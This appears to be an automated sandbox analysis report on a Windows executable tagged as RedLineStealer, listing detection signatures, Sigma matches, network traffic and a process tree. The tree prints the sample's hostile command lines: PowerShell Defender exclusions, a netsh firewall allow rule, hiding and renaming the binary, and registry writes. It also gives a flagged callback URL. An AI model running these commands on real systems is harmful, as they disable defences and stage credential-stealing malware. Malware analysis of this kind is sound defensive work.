Play interactive tour

Edit tour

Windows Analysis Report 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

Overview

General Information

Sample Name:	5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe
Analysis ID:	553368
MD5:	8fb77edbae0c40e1e19d82a406b7615a
SHA1:	0d1580519970aadaae7a4771bba39668ac0c583f
SHA256:	5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e170063a684e21bcf078
Tags:	exeRedLineStealer
Infos:
Most interesting Screenshot:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Antivirus detection for URL or domain

Sigma detected: Copying Sensitive Files with Credential Data

Creates an autostart registry key pointing to binary in C:\Windows

Creates multiple autostart registry keys

Sigma detected: Suspicious Script Execution From Temp Folder

Uses netsh to modify the Windows network and firewall settings

Uses cmd line tools excessively to alter registry or file data

Modifies the hosts file

Uses known network protocols on non-standard ports

Sigma detected: CobaltStrike Process Patterns

Sigma detected: Powershell Defender Exclusion

Uses whoami command line tool to query computer and username

Uses ipconfig to lookup or modify the Windows network settings

Adds a directory exclusion to Windows Defender

Hides that the sample has been downloaded from the Internet (zone.identifier)

Modifies the windows firewall

Sigma detected: Whoami Execution Anomaly

Creates files inside the driver directory

Queries the volume information (name, serial number etc) of a device

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Creates files inside the system directory

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Too many similar processes found

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops PE files to the windows directory (C:\Windows)

Detected TCP or UDP traffic on non-standard ports

Uses reg.exe to modify the Windows registry

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Sigma detected: Netsh Port or Application Allowed

Queries disk information (often used to detect virtual machines)

Sigma detected: Whoami Execution

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe (PID: 4356 cmdline: "C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe" MD5: 8FB77EDBAE0C40E1E19D82A406B7615A)

cmd.exe (PID: 6516 cmdline: cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

conhost.exe (PID: 1312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 3200 cmdline: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp MD5: 95000560239032BC68B4C2FDFCDEF913)

powershell.exe (PID: 1068 cmdline: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp MD5: 95000560239032BC68B4C2FDFCDEF913)

cmd.exe (PID: 7072 cmdline: cmd /Q /C move /Y C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe C:\Windows\acrotray.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 3696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

conhost.exe (PID: 6068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

WMIC.exe (PID: 3336 cmdline: wmic path win32_VideoController get name MD5: EC80E603E0090B3AC3C1234C2BA43A0F)

cmd.exe (PID: 3180 cmdline: cmd /C whoami MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

whoami.exe (PID: 2132 cmdline: whoami MD5: AA18BE1AD24DE09417C1A7459F5C1701)

cmd.exe (PID: 5556 cmdline: cmd /C "netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 4828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

netsh.exe (PID: 2056 cmdline: netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes MD5: 98CC37BBF363A38834253E22C80A8F32)

cmd.exe (PID: 5792 cmdline: cmd /C whoami MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

whoami.exe (PID: 5268 cmdline: whoami MD5: AA18BE1AD24DE09417C1A7459F5C1701)

cmd.exe (PID: 6312 cmdline: cmd /Q /C move /Y C:\Windows\acrotray.exe C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 4484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 2328 cmdline: cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 5572 cmdline: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp MD5: 95000560239032BC68B4C2FDFCDEF913)

cmd.exe (PID: 6068 cmdline: cmd /C whoami MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

whoami.exe (PID: 5580 cmdline: whoami MD5: AA18BE1AD24DE09417C1A7459F5C1701)

cmd.exe (PID: 1904 cmdline: cmd /Q /C reg add "HKCU\Software\Mystic Entertainment" /f MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

reg.exe (PID: 6636 cmdline: reg add "HKCU\Software\Mystic Entertainment" /f MD5: E3DACF0B31841FA02064B4457D44B357)

conhost.exe (PID: 4348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

WMIC.exe (PID: 2828 cmdline: wmic cpu get name MD5: EC80E603E0090B3AC3C1234C2BA43A0F)

cmd.exe (PID: 5544 cmdline: cmd /C whoami MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 3732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

whoami.exe (PID: 3200 cmdline: whoami MD5: AA18BE1AD24DE09417C1A7459F5C1701)

cmd.exe (PID: 6300 cmdline: cmd /C "attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 4432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

attrib.exe (PID: 6780 cmdline: attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe MD5: FDC601145CD289C6FBC96D3F805F3CD7)

cmd.exe (PID: 5848 cmdline: cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 4936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 1068 cmdline: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft MD5: 95000560239032BC68B4C2FDFCDEF913)

cmd.exe (PID: 6636 cmdline: cmd /C "wmic cpu get name" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

cmd.exe (PID: 6868 cmdline: cmd /C "wmic path win32_VideoController get name" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

WMIC.exe (PID: 4488 cmdline: wmic path win32_VideoController get name MD5: EC80E603E0090B3AC3C1234C2BA43A0F)

cmd.exe (PID: 6628 cmdline: cmd /C ver MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 3696 cmdline: cmd /C "wmic path win32_VideoController get name" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

cmd.exe (PID: 3076 cmdline: cmd /C whoami MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 3180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

whoami.exe (PID: 5684 cmdline: whoami MD5: AA18BE1AD24DE09417C1A7459F5C1701)

cmd.exe (PID: 7080 cmdline: cmd /C whoami MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 3752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

whoami.exe (PID: 5792 cmdline: whoami MD5: AA18BE1AD24DE09417C1A7459F5C1701)

cmd.exe (PID: 3312 cmdline: cmd /C "wmic cpu get name" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 4896 cmdline: cmd /C "ipconfig //flushdns" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

ipconfig.exe (PID: 924 cmdline: ipconfig //flushdns MD5: C7FAFF418EF7AD7ABDA10A5BCF9B53EB)

conhost.exe (PID: 5624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

whoami.exe (PID: 5872 cmdline: whoami MD5: AA18BE1AD24DE09417C1A7459F5C1701)

cmd.exe (PID: 4232 cmdline: cmd /Q /C reg add "HKCU\Software\Mystic Entertainment" /f MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

reg.exe (PID: 1860 cmdline: reg add "HKCU\Software\Mystic Entertainment" /f MD5: E3DACF0B31841FA02064B4457D44B357)

cmd.exe (PID: 3952 cmdline: cmd /C "wmic cpu get name" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 7120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6732 cmdline: cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

cmd.exe (PID: 2504 cmdline: cmd /Q /C move /Y C:\Windows\acrotray.exe C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 1864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 924 cmdline: cmd /C whoami MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

cmd.exe (PID: 4632 cmdline: cmd /Q /C reg add "HKCU\Software\Trion Softworks" /f MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

reg.exe (PID: 6152 cmdline: reg add "HKCU\Software\Trion Softworks" /f MD5: E3DACF0B31841FA02064B4457D44B357)

cmd.exe (PID: 5968 cmdline: cmd /C whoami MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

whoami.exe (PID: 5952 cmdline: whoami MD5: AA18BE1AD24DE09417C1A7459F5C1701)

cmd.exe (PID: 5648 cmdline: cmd /C "attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

attrib.exe (PID: 6504 cmdline: attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe MD5: FDC601145CD289C6FBC96D3F805F3CD7)

cmd.exe (PID: 4360 cmdline: cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 3348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 2924 cmdline: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft MD5: 95000560239032BC68B4C2FDFCDEF913)

cmd.exe (PID: 5116 cmdline: cmd /C "wmic cpu get name" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

WMIC.exe (PID: 6780 cmdline: wmic cpu get name MD5: EC80E603E0090B3AC3C1234C2BA43A0F)

cmd.exe (PID: 7116 cmdline: cmd /C "wmic path win32_VideoController get name" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 3932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

WMIC.exe (PID: 5964 cmdline: wmic path win32_VideoController get name MD5: EC80E603E0090B3AC3C1234C2BA43A0F)

cmd.exe (PID: 4624 cmdline: cmd /C ver MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 1904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 7084 cmdline: cmd /C "wmic path win32_VideoController get name" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 2260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

WMIC.exe (PID: 1760 cmdline: wmic path win32_VideoController get name MD5: EC80E603E0090B3AC3C1234C2BA43A0F)

cmd.exe (PID: 6632 cmdline: cmd /C whoami MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 4632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

whoami.exe (PID: 1244 cmdline: whoami MD5: AA18BE1AD24DE09417C1A7459F5C1701)

cmd.exe (PID: 6788 cmdline: cmd /C whoami MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 2248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

whoami.exe (PID: 6036 cmdline: whoami MD5: AA18BE1AD24DE09417C1A7459F5C1701)

cmd.exe (PID: 5756 cmdline: cmd /C "wmic cpu get name" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

WMIC.exe (PID: 4488 cmdline: wmic cpu get name MD5: EC80E603E0090B3AC3C1234C2BA43A0F)

cmd.exe (PID: 7076 cmdline: cmd /C "attrib +S +H C:\Windows\acrotray.exe" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 4768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

conhost.exe (PID: 7080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

WMIC.exe (PID: 5092 cmdline: wmic path win32_VideoController get name MD5: EC80E603E0090B3AC3C1234C2BA43A0F)

attrib.exe (PID: 5556 cmdline: attrib +S +H C:\Windows\acrotray.exe MD5: FDC601145CD289C6FBC96D3F805F3CD7)

cmd.exe (PID: 2956 cmdline: cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 5616 cmdline: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft MD5: 95000560239032BC68B4C2FDFCDEF913)

cmd.exe (PID: 6328 cmdline: cmd /C "wmic path win32_VideoController get name" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

WMIC.exe (PID: 2328 cmdline: wmic path win32_VideoController get name MD5: EC80E603E0090B3AC3C1234C2BA43A0F)

cmd.exe (PID: 5624 cmdline: cmd /C ver MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 4960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 4768 cmdline: cmd /C "wmic path win32_VideoController get name" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

acrotray.exe (PID: 7120 cmdline: "C:\Windows\acrotray.exe" MD5: 8FB77EDBAE0C40E1E19D82A406B7615A)

acrotray.exe (PID: 5268 cmdline: "C:\Windows\acrotray.exe" MD5: 8FB77EDBAE0C40E1E19D82A406B7615A)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Copying Sensitive Files with Credential Data

Show sources

Source: Process started

Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: cmd /Q /C move /Y C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe C:\Windows\acrotray.exe, CommandLine: cmd /Q /C move /Y C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe C:\Windows\acrotray.exe, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe" , ParentImage: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe, ParentProcessId: 4356, ProcessCommandLine: cmd /Q /C move /Y C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe C:\Windows\acrotray.exe, ProcessId: 7072

Sigma detected: Suspicious Script Execution From Temp Folder

Show sources

Source: Process started

Author: Florian Roth, Max Altgelt: Data: Command: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp, CommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6516, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp, ProcessId: 1068

Sigma detected: CobaltStrike Process Patterns

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: cmd /C whoami, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3180, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 5536

Sigma detected: Powershell Defender Exclusion

Show sources

Source: Process started

Author: Florian Roth: Data: Command: cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine: cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe" , ParentImage: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe, ParentProcessId: 4356, ProcessCommandLine: cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", ProcessId: 6516

Sigma detected: Whoami Execution Anomaly

Show sources

Source: Process started

Author: Florian Roth: Data: Command: whoami, CommandLine: whoami, CommandLine|base64offset|contains: , Image: C:\Windows\System32\whoami.exe, NewProcessName: C:\Windows\System32\whoami.exe, OriginalFileName: C:\Windows\System32\whoami.exe, ParentCommandLine: ipconfig //flushdns, ParentImage: C:\Windows\System32\ipconfig.exe, ParentProcessId: 924, ProcessCommandLine: whoami, ProcessId: 5872

Sigma detected: Netsh Port or Application Allowed

Show sources

Source: Process started

Author: Markus Neis, Sander Wiebing: Data: Command: netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes, CommandLine: netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: cmd /C "netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5556, ProcessCommandLine: netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes, ProcessId: 2056

Sigma detected: Whoami Execution

Show sources

Source: Process started

Author: Florian Roth: Data: Command: whoami, CommandLine: whoami, CommandLine|base64offset|contains: , Image: C:\Windows\System32\whoami.exe, NewProcessName: C:\Windows\System32\whoami.exe, OriginalFileName: C:\Windows\System32\whoami.exe, ParentCommandLine: cmd /C whoami, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3180, ProcessCommandLine: whoami, ProcessId: 2132

Sigma detected: Hiding Files with Attrib.exe

Show sources

Source: Process started

Author: Sami Ruohonen: Data: Command: attrib +S +H C:\Windows\acrotray.exe, CommandLine: attrib +S +H C:\Windows\acrotray.exe, CommandLine|base64offset|contains: jk, Image: C:\Windows\System32\attrib.exe, NewProcessName: C:\Windows\System32\attrib.exe, OriginalFileName: C:\Windows\System32\attrib.exe, ParentCommandLine: cmd /C "attrib +S +H C:\Windows\acrotray.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7076, ProcessCommandLine: attrib +S +H C:\Windows\acrotray.exe, ProcessId: 5556

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp, CommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6516, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp, ProcessId: 1068

Sigma detected: T1086 PowerShell Execution

Show sources

Source: Pipe created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132866898925142279.1068.DefaultAppDomain.powershell

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Virustotal: Detection: 20%			Perma Link
Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	ReversingLabs: Detection: 39%

Antivirus detection for URL or domain

Show sources

Source: http://185.112.83.96:20000/callback	Avira URL Cloud: Label: malware
Source: http://185.112.83.96:20000/callbackmheap.freeSpanLocked	Avira URL Cloud: Label: malware

Networking:

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 20000
Source: unknown	Network traffic detected: HTTP traffic on port 20000 -> 49751

Source: global traffic

TCP traffic: 192.168.2.3:49750 -> 185.112.83.96:60601

Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
